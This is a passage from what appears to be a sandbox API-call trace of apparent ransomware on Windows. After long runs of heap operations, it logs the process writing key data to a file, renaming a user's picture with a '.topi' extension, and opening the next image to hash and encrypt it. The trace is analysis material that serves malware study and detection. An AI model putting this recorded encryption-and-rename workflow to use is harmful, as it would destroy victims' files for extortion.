0x99f1ad0 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9408 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1b18 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9420 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9450 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9468 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.317] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9450 | out: hHeap=0x680000) returned 1 [0095.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9468 | out: hHeap=0x680000) returned 1 [0095.317] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9468 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9450 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9468 | out: hHeap=0x680000) returned 1 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9450 | out: hHeap=0x680000) returned 1 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.318] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.319] GetCurrentThreadId () returned 0x8c4 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5fe0 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.319] GetCurrentThreadId () returned 0x8c4 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9450 [0095.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.320] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9468 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9438 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9480 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9450 | out: hHeap=0x680000) returned 1 [0095.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9450 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9450 | out: hHeap=0x680000) returned 1 [0095.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9480 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9468 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9438 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9420 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1b18 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.324] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x26aa, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x26aa, lpOverlapped=0x0) returned 1 [0095.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.324] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x26af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.324] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.325] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.325] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.325] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.325] CloseHandle (hObject=0x6a8) returned 1 [0095.333] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3fba8e.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3fba8e.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3fba8e.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3fba8e.png.topi")) returned 1 [0095.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.334] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.335] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe70fdee0, ftCreationTime.dwHighDateTime=0x1d5c2af, ftLastAccessTime.dwLowDateTime=0xee6ed670, ftLastAccessTime.dwHighDateTime=0x1d5b722, ftLastWriteTime.dwLowDateTime=0xee6ed670, ftLastWriteTime.dwHighDateTime=0x1d5b722, nFileSizeHigh=0x0, nFileSizeLow=0x12c7e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Rw8e.bmp", cAlternateFileName="")) returned 1 [0095.336] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8Rw8e.bmp") returned=".bmp" [0095.336] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8Rw8e.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8rw8e.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.336] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=76926) returned 1 [0095.336] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.339] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x12c58, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.339] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.341] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.342] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.342] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.342] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.342] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.342] GetLastError () returned 0x0 [0095.342] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.342] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.343] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.343] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.343] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x12c80) returned 0x9a06a00 [0095.343] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1b18 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9420 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1b60 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9438 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9468 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9480 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.344] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9468 | out: hHeap=0x680000) returned 1 [0095.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9480 | out: hHeap=0x680000) returned 1 [0095.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9480 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9468 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9480 | out: hHeap=0x680000) returned 1 